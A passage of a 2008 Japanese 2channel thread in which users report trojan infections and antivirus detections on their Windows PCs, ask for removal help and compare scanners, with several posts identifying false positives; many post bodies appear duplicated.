昨日からIEで広告が出てくるようになる
⇒ウイルスセキュリティzeroで検索
⇒何も出ず
⇒Hijackthisのログも問題なし
⇒調べるとトロイである可能性が出てきた
(System32とtempの中にランダム英数字のexeとa_aファイルが作成されて動いていた為)
⇒Trojan Vundoだと目星をつける
⇒シマンテック製の無料駆除ツール、FixVundoで駆除
⇒数時間後また別のexe、a_aが発生
⇒FixVundoで駆除
⇒また別のファイルの発生 以後ループ
⇒完全に消せない
⇒このスレを発見
⇒カスペルを入れる
⇒Trojan-Downloader.Win32.BHO.pe検出
⇒駆除 ←今ココ
exeファイルとa_aファイル消してもまた復活しそうな気がする…
そもそもtrojanの本体がわからんし、カスペル導入しても治らなかったら・・
助けてくだしあ
⇒ウイルスセキュリティzeroで検索
⇒何も出ず
⇒Hijackthisのログも問題なし
⇒調べるとトロイである可能性が出てきた
(System32とtempの中にランダム英数字のexeとa_aファイルが作成されて動いていた為)
⇒Trojan Vundoだと目星をつける
⇒シマンテック製の無料駆除ツール、FixVundoで駆除
⇒数時間後また別のexe、a_aが発生
⇒FixVundoで駆除
⇒また別のファイルの発生 以後ループ
⇒完全に消せない
⇒このスレを発見
⇒カスペルを入れる
⇒Trojan-Downloader.Win32.BHO.pe検出
⇒駆除 ←今ココ
exeファイルとa_aファイル消してもまた復活しそうな気がする…
そもそもtrojanの本体がわからんし、カスペル導入しても治らなかったら・・
助けてくだしあ
86 :名無しさん@お腹いっぱい。:2008/08/12(火) 22:33:54
>>85
まただめだったら、BitDefenderを使ってみるとか?
【cool】BitDefender Free Edition 27【free】
http://pc11.2ch.net/test/read.cgi/sec/1216279063
まただめだったら、BitDefenderを使ってみるとか?
【cool】BitDefender Free Edition 27【free】
http://pc11.2ch.net/test/read.cgi/sec/1216279063
87 :名無しさん@お腹いっぱい。:2008/08/12(火) 22:57:23
今時Bitはねーわ マカと並んでもうだめぽの筆頭
88 :名無しさん@お腹いっぱい。:2008/08/13(水) 01:49:47
>>87
じゃあ、代替案でも言えよ。人のレスにケチ付けるしか能がないクズか?
じゃあ、代替案でも言えよ。人のレスにケチ付けるしか能がないクズか?
89 :名無しさん@お腹いっぱい。:2008/08/13(水) 14:01:32
AVG
90 :名無しさん@お腹いっぱい。:2008/08/13(水) 14:18:03
91 :名無しさん@お腹いっぱい。:2008/08/13(水) 14:20:09
カスペルで駆除した後、IEのバージョンを上げてWindowsliveをインスコし直し
a_aの定義レジストリ削除・・・とやってみたら、とりあえず現時点では反応が消えました。
IEのバージョンを上げたのはiexpore.exeが怪しかった為です。
Windowslibeをインスコし直したのは不自然なインストール作業部分があった為です。
数時間ネットサーフィンして、今まで不定期に出ていた広告も
system32に作られる英数字のexe、a_aも消えたので、まず安心。
a_aの定義レジストリ削除・・・とやってみたら、とりあえず現時点では反応が消えました。
IEのバージョンを上げたのはiexpore.exeが怪しかった為です。
Windowslibeをインスコし直したのは不自然なインストール作業部分があった為です。
数時間ネットサーフィンして、今まで不定期に出ていた広告も
system32に作られる英数字のexe、a_aも消えたので、まず安心。
92 :名無しさん@お腹いっぱい。:2008/08/13(水) 14:44:17
liveなのかlibeなのか
93 :名無しさん@お腹いっぱい。:2008/08/13(水) 17:41:20
rideでした
いや、なんでもない
普通に間違えたわ
いや、なんでもない
普通に間違えたわ
94 :名無しさん@お腹いっぱい。:2008/08/14(木) 03:08:24
初めて書き込みます。スレとずれた質問ならごめんなさい。
彼氏のPCがトロイの木馬に感染してました。
種類?は「灰色の鳩」?らしいんですが、
アダプタにSDカードを差して画像を見ていた場合(PCへの保存はしてない)盗まれることってあるんでしょうか。
1枚だけメールに送った画像があったらしく既に流出してました。
色々調べてみたんですがよくわからなくて・・・。
彼氏のPCがトロイの木馬に感染してました。
種類?は「灰色の鳩」?らしいんですが、
アダプタにSDカードを差して画像を見ていた場合(PCへの保存はしてない)盗まれることってあるんでしょうか。
1枚だけメールに送った画像があったらしく既に流出してました。
色々調べてみたんですがよくわからなくて・・・。
95 :名無しさん@お腹いっぱい。:2008/08/14(木) 05:02:07
96 :名無しさん@お腹いっぱい。:2008/08/14(木) 15:37:22
97 :名無しさん@お腹いっぱい。:2008/08/14(木) 16:51:38
>>76
USBメモリを叩き壊せ
USBメモリを叩き壊せ
98 :名無しさん@お腹いっぱい。:2008/08/14(木) 19:10:27
うちのPCもやられたっぽい。
なんか壁紙が赤くて恐い奴に変わるw
んで、さっきからマイクロソフトやトレンドマイクロなんかの
サイトにアクセスしようとしてもブロックされる(普通のサイトは
見られる)んだが、これもウイルスにやられてるの?
今のところ、検索して見つけたフリーのソフト(a-squared free)を
入れてスキャン→削除してPCを再起動させたんだが、それでも
警告が出る。つかWindows(標準?)のセキュリティの奴うぜえ・・・
なんか壁紙が赤くて恐い奴に変わるw
んで、さっきからマイクロソフトやトレンドマイクロなんかの
サイトにアクセスしようとしてもブロックされる(普通のサイトは
見られる)んだが、これもウイルスにやられてるの?
今のところ、検索して見つけたフリーのソフト(a-squared free)を
入れてスキャン→削除してPCを再起動させたんだが、それでも
警告が出る。つかWindows(標準?)のセキュリティの奴うぜえ・・・
99 :名無しさん@お腹いっぱい。:2008/08/20(水) 07:41:20
うちのはTrojanで出るのじゃなくトロイの木馬で出る
皆の奴のとは違うのだろうか・・・
カスペルお試しでやったけど何も出ず、お試しきれてVBに切り替えてみる
トロイの木馬は消えておらず12件のスパイウェア
やってられない
皆の奴のとは違うのだろうか・・・
カスペルお試しでやったけど何も出ず、お試しきれてVBに切り替えてみる
トロイの木馬は消えておらず12件のスパイウェア
やってられない
100 :名無しさん@お腹いっぱい。:2008/08/20(水) 16:22:31
昨夜からVBがtroj virantix ajってのを検出して隔離しますたって警告が何回もでる。
101 :名無しさん@お腹いっぱい。:2008/08/20(水) 20:31:44
>>100
何回も出るってことは元が残ってて次々生成してんじゃ?
何回も出るってことは元が残ってて次々生成してんじゃ?
102 :名無しさん@お腹いっぱい。:2008/08/21(木) 00:20:10
昨日パソコンを普通に起動しました。
すると、起動してネットに繋がった瞬間トロイに感染したとウインドウが出ました。
ネットに繋がるのとアンチウイルスソフトが稼動する間約5秒の間に感染したと思われます。
こんなことってありえるのでしょうか……
3〜4種類の、ウイルス検索ソフトを使ってみたのですが、いずれもトロイを感知せず、トロイがどうなったのいかわからない状況です。
まだ具体的な被害は受けていないのですが、どういった対処をするべきでしょうか……
すると、起動してネットに繋がった瞬間トロイに感染したとウインドウが出ました。
ネットに繋がるのとアンチウイルスソフトが稼動する間約5秒の間に感染したと思われます。
こんなことってありえるのでしょうか……
3〜4種類の、ウイルス検索ソフトを使ってみたのですが、いずれもトロイを感知せず、トロイがどうなったのいかわからない状況です。
まだ具体的な被害は受けていないのですが、どういった対処をするべきでしょうか……
103 :名無しさん@お腹いっぱい。:2008/08/21(木) 14:47:53
>>102
> すると、起動してネットに繋がった瞬間トロイに感染したとウインドウが出ました。
感染したって出たのか?入ってこようとしたからブロックしたって出たのか?
使ってるソフト名と正確なメッセージくらい書けよ タコ
> すると、起動してネットに繋がった瞬間トロイに感染したとウインドウが出ました。
感染したって出たのか?入ってこようとしたからブロックしたって出たのか?
使ってるソフト名と正確なメッセージくらい書けよ タコ
104 :名無しさん@お腹いっぱい。:2008/08/23(土) 12:11:12
Rootkit-Agent.AEに感染してしまいました。
AVGで駆除を試してみたのですが。ファイルが起動中らしく隔離、削除ができません
セーフーモードでの手動駆除も無理でした。対処のほどをお願いします。。。
AVGで駆除を試してみたのですが。ファイルが起動中らしく隔離、削除ができません
セーフーモードでの手動駆除も無理でした。対処のほどをお願いします。。。
カペルスキー入れたら出なくなった。
106 :名無しさん@お腹いっぱい。:2008/08/24(日) 02:39:49
ファイルが起動中なら、ハイジャックディスをインストールして
起動中の怪しいものが見つかるんじゃないか
起動中の怪しいものが見つかるんじゃないか
107 :名無しさん@お腹いっぱい。:2008/08/31(日) 15:35:36
てす
108 :名無しさん@お腹いっぱい。:2008/09/01(月) 00:51:02
Downloader.Win32.BHO.peが何回駆除しても復活する
復活するさいにa_aとexeファイルが作られて勝手に起動される
とりあえず作成されてもすぐに削除していて
今のとこひどい被害は受けてなさそうだが
どうにかしたいんだけど誰かわかりませんか?
一応>>91のみてIEのバージョンアップはしておきましたが変わらなかったです
復活するさいにa_aとexeファイルが作られて勝手に起動される
とりあえず作成されてもすぐに削除していて
今のとこひどい被害は受けてなさそうだが
どうにかしたいんだけど誰かわかりませんか?
一応>>91のみてIEのバージョンアップはしておきましたが変わらなかったです
109 :名無しさん@お腹いっぱい。:2008/09/01(月) 03:29:12
downloader.Generic_c.ACXってのにかかった。
害はないっぽいが。
害はないっぽいが。
110 :名無しさん@お腹いっぱい。:2008/09/01(月) 04:42:21
111 :名無しさん@お腹いっぱい。:2008/09/01(月) 07:06:50
>>109-110
AVGですか?
いや、自分もなんですけど…(こちらはAVG7.5)
AVG固有の問題でしょうか。こんなの見つけたけど
http://www.disboards.com/showthread.php?t=1937018
AVGですか?
いや、自分もなんですけど…(こちらはAVG7.5)
AVG固有の問題でしょうか。こんなの見つけたけど
http://www.disboards.com/showthread.php?t=1937018
112 :名無しさん@お腹いっぱい。:2008/09/01(月) 10:36:48
AVG8.0がGeneric_c.ACXをやたらと検知する
昨日からなんですけど、みんなは?
昨日からなんですけど、みんなは?
113 :名無しさん@お腹いっぱい。:2008/09/01(月) 12:25:28
同じく昨日から検出されてる
因みにAVG8.0
どうやら誤検出みたいだけど
AVG側が対応するまで我慢か
因みにAVG8.0
どうやら誤検出みたいだけど
AVG側が対応するまで我慢か
114 :名無しさん@お腹いっぱい。:2008/09/01(月) 13:16:47
俺も同じくです
115 :名無しさん@お腹いっぱい。:2008/09/01(月) 15:00:24
俺もです
これは安心していいのかな?
これは安心していいのかな?
116 :名無しさん@お腹いっぱい。:2008/09/01(月) 15:56:43
えろつべで北
117 :名無しさん@お腹いっぱい。:2008/09/01(月) 16:19:37
えろつべか、なるほど。確かに見た
118 :名無しさん@お腹いっぱい。:2008/09/01(月) 17:55:03
みんなエロいね
隔離室に16個あるぜ
隔離室に16個あるぜ
119 :名無しさん@お腹いっぱい。:2008/09/02(火) 02:03:26
変なの踏んだ後だからちと怖い@@;
AVGのせいならいいけど何気に最近問題ばっかりだねAVGw
AVGのせいならいいけど何気に最近問題ばっかりだねAVGw
120 :名無しさん@お腹いっぱい。:2008/09/04(木) 12:12:02
最近カボスでmp3落とすと、落とした瞬間にウィルスバスターが反応してトロイ系を示すんだけど原因わかりますか?
121 :名無しさん@お腹いっぱい。:2008/09/04(木) 12:41:11
個別のソフトのことなんか知ったこっちゃないので
ダウソ板かバスタースレでどうぞ
ダウソ板かバスタースレでどうぞ
122 :名無しさん@お腹いっぱい。:2008/09/04(木) 23:46:02
AVGが、Startpage.CZAというトロイの木馬を発見し
隔離したと言っているけど
改変されたであろうレジストリはそのまま?
隔離したと言っているけど
改変されたであろうレジストリはそのまま?
123 :名無しさん@お腹いっぱい。:2008/09/05(金) 13:39:47
普段使っているノート/98SE/Firefox/KerioFirewallは何も異常ないのに、
たまたまデスクトップ/Server2008/IE/標準のファイヤウォール+ソフトチェック機能有効/Comodoでガッチリ固めてる方で
遊んだらoky.exeとかバックドア仕込まれた。orz
仕込みがソフトに混入していたのかweb経由なのか原因が不明。
ソフトではなくてweb経由か、たまたまポート開放した隙を突かれたか。
ログにはトロイやスクリプトのブロック履歴は残ってるが、それ以外の情報が全く分からない。
ウイルス自体はカスペのデータベースでアクセス先などは分かったけど、根本原因が分からないと
何か気持悪いな。
幸いブロックが効いて何も影響なし、動作が異常に重かったのですぐ気付いたが、
その日やった事といえば、前日に他のPCとの接続テストでjunboblackdogとHTTPDを動作させたのと、
ステアカート?とかいうオンラインゲームを試しに遊んでみようと起動させてアップデートデータを
ダウンロードさせたくらいで、
あとはFirefoxで普通のページ閲覧してたくらいなんだが…。
ノートPCでも見てるページ・動作させてるソフトくらいしか使ってないのになんで?って感じだ。
気持悪いんでFirefoxも3に移行した。
駆除は一瞬だが、念の為の総いれ直し、設定の復旧に半日かかったよ…。
Firefox2の方に何か希弱性があるのか?
oky.exeの方は検索にすらかからない。
firefoxupdater.exeとかいうプログラムが居たので削除。これもBBS検索で
ウイルスじゃなくて更新プログラムです、みたいな書きこみぐらいしかなかったが、
滅茶苦茶怪しい。
怪しいプログラムやvbsで調べると出てくるのは中華系の書きこみは大量にでてくるが、アッチ系のマルウェアとかウイルスなんだろうな。
日本の情報は殆どないのと、質問に対していい加減な回答で終わってるQ&Aページだけってのが不気味。
まぁ、仕事用のPCで遊んだバチか…。
たまたまデスクトップ/Server2008/IE/標準のファイヤウォール+ソフトチェック機能有効/Comodoでガッチリ固めてる方で
遊んだらoky.exeとかバックドア仕込まれた。orz
仕込みがソフトに混入していたのかweb経由なのか原因が不明。
ソフトではなくてweb経由か、たまたまポート開放した隙を突かれたか。
ログにはトロイやスクリプトのブロック履歴は残ってるが、それ以外の情報が全く分からない。
ウイルス自体はカスペのデータベースでアクセス先などは分かったけど、根本原因が分からないと
何か気持悪いな。
幸いブロックが効いて何も影響なし、動作が異常に重かったのですぐ気付いたが、
その日やった事といえば、前日に他のPCとの接続テストでjunboblackdogとHTTPDを動作させたのと、
ステアカート?とかいうオンラインゲームを試しに遊んでみようと起動させてアップデートデータを
ダウンロードさせたくらいで、
あとはFirefoxで普通のページ閲覧してたくらいなんだが…。
ノートPCでも見てるページ・動作させてるソフトくらいしか使ってないのになんで?って感じだ。
気持悪いんでFirefoxも3に移行した。
駆除は一瞬だが、念の為の総いれ直し、設定の復旧に半日かかったよ…。
Firefox2の方に何か希弱性があるのか?
oky.exeの方は検索にすらかからない。
firefoxupdater.exeとかいうプログラムが居たので削除。これもBBS検索で
ウイルスじゃなくて更新プログラムです、みたいな書きこみぐらいしかなかったが、
滅茶苦茶怪しい。
怪しいプログラムやvbsで調べると出てくるのは中華系の書きこみは大量にでてくるが、アッチ系のマルウェアとかウイルスなんだろうな。
日本の情報は殆どないのと、質問に対していい加減な回答で終わってるQ&Aページだけってのが不気味。
まぁ、仕事用のPCで遊んだバチか…。
124 :名無しさん@お腹いっぱい。:2008/09/07(日) 10:09:30
OSはXP ウィルスセキュリティーゼロ使用中。
手動検査にて Trojan.Win32.Malware.1 検出されたようで駆除されました。
場所が C:\ProgramFiles\The Cleaner Free で 名前が ms1000.sys
それは誤検知かと思われますが
場所が C:\WINDOWS\system32\drivers 名前が MS1000.sys も削除されました。
こちらは削除されても問題ないでしょうか?
手動検査にて Trojan.Win32.Malware.1 検出されたようで駆除されました。
場所が C:\ProgramFiles\The Cleaner Free で 名前が ms1000.sys
それは誤検知かと思われますが
場所が C:\WINDOWS\system32\drivers 名前が MS1000.sys も削除されました。
こちらは削除されても問題ないでしょうか?
125 :名無しさん@お腹いっぱい。:2008/09/07(日) 11:50:42
>>124
使ってるソフトが問題なだけ
使ってるソフトが問題なだけ
126 :名無しさん@お腹いっぱい。:2008/09/07(日) 12:56:25
127 :名無しさん@お腹いっぱい。:2008/09/07(日) 16:18:48
>>112
俺もだ
昨日久々にAutomate unDRMを使おうとしたらトロイを感知して隔離したんだけど
再インストールや再ダウンロードしようとしても感知した
更に外付けHDにあるバックアップをコピーしようとしても感知したから
Automate unDRMの何かに反応してるっぽい
俺もだ
昨日久々にAutomate unDRMを使おうとしたらトロイを感知して隔離したんだけど
再インストールや再ダウンロードしようとしても感知した
更に外付けHDにあるバックアップをコピーしようとしても感知したから
Automate unDRMの何かに反応してるっぽい
128 :名無しさん@お腹いっぱい。:2008/09/07(日) 17:10:43
129 :名無しさん@お腹いっぱい。:2008/09/07(日) 17:37:06
130 :名無しさん@お腹いっぱい。:2008/09/07(日) 18:26:37
131 :名無しさん@お腹いっぱい。:2008/09/07(日) 22:01:21
124でつ
以前DLしたフリーソフトを検知して削除しただけなのでNP
ということを自力で納得できますた。
やっぱ使えんな・・・
以前DLしたフリーソフトを検知して削除しただけなのでNP
ということを自力で納得できますた。
やっぱ使えんな・・・
132 :名無しさん@お腹いっぱい。:2008/09/07(日) 22:27:49
133 :名無しさん@お腹いっぱい。:2008/09/08(月) 08:31:38
>>132
返レスども。
そうですねぇ・・・
たまたま どーでもいいフリーソフト関連だったからよかった感ありですがw
ウィルスの場合には 検出たんびにメッセ出て 対応支持することが不可能な設定のようですし・・・
返レスども。
そうですねぇ・・・
たまたま どーでもいいフリーソフト関連だったからよかった感ありですがw
ウィルスの場合には 検出たんびにメッセ出て 対応支持することが不可能な設定のようですし・・・
134 :ぼるじょあ ◆yBEncckFOU :2008/09/09(火) 14:50:15
Troj/PWS-ATI 引っかかってきてる人います?こっちは大量に入ってきてしまって火消しにヒーコラ言ってる状態。
ポーランドからのメール持ってる人いたら詳細なヘッダをコピペしてくれないかな。
ポーランドからのメール持ってる人いたら詳細なヘッダをコピペしてくれないかな。
135 :名無しさん@お腹いっぱい。:2008/09/09(火) 14:51:03
ギャア、名前消し忘れてるC
136 :名無しさん@お腹いっぱい。:2008/09/11(木) 12:47:02
Be板にカエレ
137 :名無しさん@お腹いっぱい。:2008/09/16(火) 21:16:13
PC全てにスキャンかけたが脅威は見つかりませんでした
が、USBメモリ調べたらトロイの木馬を発見
それ以外にも三個ウイルス発見
一個は削除できたけど木馬と残りは削除不可能orz
なんか最近勝手に消えたりするなーとは思っていたが…
が、USBメモリ調べたらトロイの木馬を発見
それ以外にも三個ウイルス発見
一個は削除できたけど木馬と残りは削除不可能orz
なんか最近勝手に消えたりするなーとは思っていたが…
138 :名無しさん@お腹いっぱい。:2008/09/19(金) 16:37:58
自分はカスペルスキーインターネットセキュリティを使っているのですが
先ほどパソコンを立ち上げたら
『ファイル c:\windows\forbidden siren.scr: トロイの木馬 「Trojan-PSW.Win32.Agent.kvu」を検知しました!』
『ファイル c:\windows\forbid~1.scr: トロイの木馬 「Trojan-PSW.Win32.Agent.kvu」を検知しました!』
と出たんですがこのファイルは消してしまっても大丈夫なんでしょうか?
先ほどパソコンを立ち上げたら
『ファイル c:\windows\forbidden siren.scr: トロイの木馬 「Trojan-PSW.Win32.Agent.kvu」を検知しました!』
『ファイル c:\windows\forbid~1.scr: トロイの木馬 「Trojan-PSW.Win32.Agent.kvu」を検知しました!』
と出たんですがこのファイルは消してしまっても大丈夫なんでしょうか?
139 :名無しさん@お腹いっぱい。:2008/09/19(金) 18:16:06
ウイルス飼っててもしゃーないだろ、消せよ
140 :名無しさん@お腹いっぱい。:2008/09/20(土) 16:46:12
最近vundo多くね
141 :名無しさん@お腹いっぱい。:2008/09/20(土) 16:56:24
くねくね言うなよバカゆとり
142 :名無しさん@お腹いっぱい。:2008/09/22(月) 01:56:27
カスペルスキーオンラインスキャンの準備のDL長すぎワロ・・・タ・・・・zzzz
143 :名無しさん@お腹いっぱい。:2008/09/22(月) 17:57:04
ノートンがトロイ防いでくれず、駆除方法を色々調べて
このスレにたどり着いてカスペルで駆除したが完全に消えたか不安・・・。
今プロテクション?とかいうので保護かけてるけど・・・
上のレス見てると数時間後にまた発生(カスペル以外で駆除した時みたいだが)したらしくて
めちゃくちゃ不安だ。
ノートンってここまで糞だったのか・・・セキリュティソフトはあまり詳しくなかったが
有名どころだからと信じてた俺が愚かだった
試用期間終わったらカスペルに切り替えよう・・・。
このスレにたどり着いてカスペルで駆除したが完全に消えたか不安・・・。
今プロテクション?とかいうので保護かけてるけど・・・
上のレス見てると数時間後にまた発生(カスペル以外で駆除した時みたいだが)したらしくて
めちゃくちゃ不安だ。
ノートンってここまで糞だったのか・・・セキリュティソフトはあまり詳しくなかったが
有名どころだからと信じてた俺が愚かだった
試用期間終わったらカスペルに切り替えよう・・・。
144 :名無しさん@お腹いっぱい。:2008/09/22(月) 19:40:02
>>143
気づくのが遅かった…が、気づいただけマシだ
気づくのが遅かった…が、気づいただけマシだ
145 :名無しさん@お腹いっぱい。:2008/09/23(火) 20:05:11
c:\WINDOWS\system32\のWin32:TrafficSolってファイルがトロイに感染してるみたいなんですが、どうやって処理したらいいんですか?
システムファイル何で消してはいけないんですよね?
PCに詳しくないので・・・すみません
システムファイル何で消してはいけないんですよね?
PCに詳しくないので・・・すみません
すみません、今見たらWin32:TrafficSolって言うのがアドウェアで
SPRT_ADS.DLLってシステムファイルに感染してるんでした
SPRT_ADS.DLLってシステムファイルに感染してるんでした
147 :名無しさん@お腹いっぱい。:2008/09/23(火) 23:25:25
昨日某うpろだ開いたら広告だらけで閉じる→もう一回開く
をしたときにff.swfを検出したって出てきた。
ドメインを調べたが中国だった。
ソースチェッカーオンラインで昨日見たときは存在してたが
今日見たらなくなってた。なんだろうこれ。
をしたときにff.swfを検出したって出てきた。
ドメインを調べたが中国だった。
ソースチェッカーオンラインで昨日見たときは存在してたが
今日見たらなくなってた。なんだろうこれ。
148 :名無しさん@お腹いっぱい。:2008/09/24(水) 00:37:50
・広告は毎回同じ物が読み込まれるわけじゃない
・ウイルス配布サイトは解析を避けるため2度目はシカトすることがある
・ウイルス配布サイトは解析を避けるため2度目はシカトすることがある
149 :名無しさん@お腹いっぱい。:2008/09/24(水) 06:40:07
すみません、質問させていただください。TROJ_BOHMINI.Rというトロイの木馬が検出されたのですが、調べてみても対策がわかりません。
どなたかアドバイスをよろしくお願いします。
どなたかアドバイスをよろしくお願いします。
150 :名無しさん@お腹いっぱい。:2008/09/24(水) 07:23:29
バスタースレで聞いてくれ
151 :名無しさん@お腹いっぱい。:2008/09/24(水) 10:38:59
>>148
ff.swfってファイルがあったサーバー自体がなくなってるんだが
ff.swfってファイルがあったサーバー自体がなくなってるんだが
152 :名無しさん@お腹いっぱい。:2008/09/24(水) 13:26:58
ソースネクスト商品は地雷 ウイルスセキュリティZEROよりフリーソフトの方が安全
これテストに出るからな
これテストに出るからな
153 :名無しさん@お腹いっぱい。:2008/09/24(水) 18:29:03
>>143
今頃そんなこと言われてもなぁ。。。 散々がいしゅつだし。。。
今頃そんなこと言われてもなぁ。。。 散々がいしゅつだし。。。
154 :名無しさん@お腹いっぱい。:2008/10/08(水) 09:17:52
help meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
155 :名無しさん@お腹いっぱい。:2008/10/12(日) 10:41:32
久々に検索したら、復元フォルダ(C:\System Volume Information\_restore)
Win32:Downloader-BPZ [Trj]が発見されてので削除した
ぐぐっても同名はおじいちゃんのメモしか見つからないのだけれど
ttp://www.shareedge.com/spywareguide/product_show.php?id=3237
目立った変化は無かったのですが
これと同タイプの動きをしていたと考えて良いのでしょうか?
Win32:Downloader-BPZ [Trj]が発見されてので削除した
ぐぐっても同名はおじいちゃんのメモしか見つからないのだけれど
ttp://www.shareedge.com/spywareguide/product_show.php?id=3237
目立った変化は無かったのですが
これと同タイプの動きをしていたと考えて良いのでしょうか?
156 :名無しさん@お腹いっぱい。:2008/10/13(月) 12:50:35
AVGがトロイと判断した
JWORDを消す、これは分かるからいいとして
ぶらばんまで、ここの会社サイトのっとられた事あったから消した
アンインストールが手動になるだけだからいいか
誤検知か感染か、わくわくと恐怖。
JWORDを消す、これは分かるからいいとして
ぶらばんまで、ここの会社サイトのっとられた事あったから消した
アンインストールが手動になるだけだからいいか
誤検知か感染か、わくわくと恐怖。
157 :名無しさん@お腹いっぱい。:2008/10/13(月) 20:31:03
すまんが、
トヨタのhpに行くと、トロイの木馬を検出しましたと出るんだが、、、
俺だけか・・・・・・
トヨタのhpに行くと、トロイの木馬を検出しましたと出るんだが、、、
俺だけか・・・・・・
158 :名無しさん@お腹いっぱい。:2008/10/13(月) 22:18:56
>158
すべて最新になってるんだよ、、
KIS7(カスペ)なんだけど
Trojan.JS.Aqent.dbってのを検出する。
誤検知なのかな?????
すべて最新になってるんだよ、、
KIS7(カスペ)なんだけど
Trojan.JS.Aqent.dbってのを検出する。
誤検知なのかな?????
他スレ見たら、出た人がいるね。
誤検知みたいだから、しばらく様子見ます。
誤検知みたいだから、しばらく様子見ます。
たびたびすいません
出なくなりました。
KIS7はいじって無いので
toyota側で修正したと思われます。
出なくなりました。
KIS7はいじって無いので
toyota側で修正したと思われます。
162 :名無しさん@お腹いっぱい。:2008/10/13(月) 23:54:23
163 :名無しさん@お腹いっぱい。:2008/10/13(月) 23:55:41
トヨタがまぎらわしいプログラムで作ったって事か
164 :名無しさん@お腹いっぱい。:2008/10/14(火) 03:24:36
AVGがぶらばんだけでなく他のゲームのexeからもトロイ検出した。
これは158を見るかぎり誤検知と見ていいのかな
これは158を見るかぎり誤検知と見ていいのかな
アップデートされてなかったわ。
した後は何も検知されなかった。
誤検知みたいで良かったわ
した後は何も検知されなかった。
誤検知みたいで良かったわ
166 :名無しさん@お腹いっぱい。:2008/10/14(火) 19:09:58
時々 internet explorer searchers とかいうのがspybotで引っかかるんだけど、
トロイの仕業?
トロイの仕業?
167 :名無しさん@お腹いっぱい。:2008/10/15(水) 22:39:17
TORJ FAKEAV.mcs とかいうのが検出されたんだが…
いったいどんなものなのかさっぱり情報がないんだけど知ってる人いる?
とりあえず削除してシステムの復元を無効にしたけど…
いったいどんなものなのかさっぱり情報がないんだけど知ってる人いる?
とりあえず削除してシステムの復元を無効にしたけど…
168 :名無しさん@お腹いっぱい。:2008/10/15(水) 23:04:23
↑ごめん
×TORJ
○TROJ
×TORJ
○TROJ
169 :名無しさん@お腹いっぱい。:2008/10/15(水) 23:25:12
>>167
私も22時34分にウィルスバスター2007がそれを検知しました。
WindowsVistaのUpdate中に検知しました。
初めてのウィルス検知で気が動転して、LANケーブル抜いて今に至ります。
ウィルスのログには、Program Files\Java\jre1.6.0\bin\jusched.exe
と書いてあります
私も22時34分にウィルスバスター2007がそれを検知しました。
WindowsVistaのUpdate中に検知しました。
初めてのウィルス検知で気が動転して、LANケーブル抜いて今に至ります。
ウィルスのログには、Program Files\Java\jre1.6.0\bin\jusched.exe
と書いてあります
>>169
調べてみたらウイルスバスターの誤警告らしい。たぶんほっといて大丈夫っぽい。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FFAKEAV%2EMCS&VSect=P
自分もかなり動転したww
調べてみたらウイルスバスターの誤警告らしい。たぶんほっといて大丈夫っぽい。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FFAKEAV%2EMCS&VSect=P
自分もかなり動転したww
171 :名無しさん@お腹いっぱい。:2008/10/15(水) 23:46:47
172 :名無しさん@お腹いっぱい。:2008/10/17(金) 22:28:32
2ちゃんのあるスレで貼ってあったURLクリックしたら変なサイトに飛びました
すぐ消したんですが、そのあとについてたレスが「ウイルス貼るな!」「トロイだから踏まないように」などというものでした
すぐバスターでスキャンしたんですが、なにも検出されず、カスペルスキーのオンラインスキャンもやったんですが何も検出されませんでした
鑑定スレに出したら「すごい危険だから絶対踏むな」とのレスが返って来ました
リカバリするしかないですかね
すぐ消したんですが、そのあとについてたレスが「ウイルス貼るな!」「トロイだから踏まないように」などというものでした
すぐバスターでスキャンしたんですが、なにも検出されず、カスペルスキーのオンラインスキャンもやったんですが何も検出されませんでした
鑑定スレに出したら「すごい危険だから絶対踏むな」とのレスが返って来ました
リカバリするしかないですかね
つけたし
PCはなんの異常もないんですが・・・
PCはなんの異常もないんですが・・・
174 :名無しさん@お腹いっぱい。:2008/10/17(金) 22:36:57
マルチ死ね
175 :名無しさん@お腹いっぱい。:2008/10/22(水) 21:22:52
家に帰ったらPCが勝手に再起動していて
カスペルスキー先生がTrojan.Win32.Agent.goaに感染してるよ!!って言ってくれてる
しかし、モジュールがsvchost.exeなんだ。
駆除できないし。
おまけに巻き込まれて感染してたのを消したらタスクマネージャが起動不能になったし
どうしたらいいのか・・・・
カスペルスキー先生がTrojan.Win32.Agent.goaに感染してるよ!!って言ってくれてる
しかし、モジュールがsvchost.exeなんだ。
駆除できないし。
おまけに巻き込まれて感染してたのを消したらタスクマネージャが起動不能になったし
どうしたらいいのか・・・・
176 :名無しさん@お腹いっぱい。:2008/10/23(木) 17:55:05
svchostが呼んでる何かだろ
177 :名無しさん@お腹いっぱい。:2008/10/24(金) 04:28:16
カスペで何となく完全スキャンかけて見たら「Exploit.Win32.IMG-GIF.bに感染しています」とか出やがった('A`)
178 :名無しさん@お腹いっぱい。:2008/10/25(土) 18:57:47
ある仕事で使ってたファイルがあって、
サイズはトロイっぽい感じ。
でも知り合いから回ってきたし大丈夫だろうと使用してて、
この前偶然ノートンでスキャン。トロイだと出る。
でも、特定のトロイだと断定されたわけじゃなくて、
凡用名で警告がでる。つまりトロイっぽいですよと。
家に帰ってアバストでスキャン。何も出ず。
カスペルでスキャン。何も出ず。
ウイルスバスターでスキャン。ダイアリーとかいう
わけのわからん、どうでもいいウイルス?ですよ。と出る。
被害がほとんどないわけわからんウイルス。
この場合、みなさんならどうします?
アバストとカスペルでトロイ名が断定されて警告ならビビるけど、
ノートンだけでトロイ認定されても、何かね・・・・。
ウイルスバスターの結果も意味不明だし。
これで再インストールとかする勇気はないなぁー
サイズはトロイっぽい感じ。
でも知り合いから回ってきたし大丈夫だろうと使用してて、
この前偶然ノートンでスキャン。トロイだと出る。
でも、特定のトロイだと断定されたわけじゃなくて、
凡用名で警告がでる。つまりトロイっぽいですよと。
家に帰ってアバストでスキャン。何も出ず。
カスペルでスキャン。何も出ず。
ウイルスバスターでスキャン。ダイアリーとかいう
わけのわからん、どうでもいいウイルス?ですよ。と出る。
被害がほとんどないわけわからんウイルス。
この場合、みなさんならどうします?
アバストとカスペルでトロイ名が断定されて警告ならビビるけど、
ノートンだけでトロイ認定されても、何かね・・・・。
ウイルスバスターの結果も意味不明だし。
これで再インストールとかする勇気はないなぁー
179 :名無しさん@お腹いっぱい。:2008/10/25(土) 20:04:29
今VirusTotalでスキャンしたら、36のスキャンのうち、
5個で疑わしいと出て、5個でトロイかウイルスだと出ました。
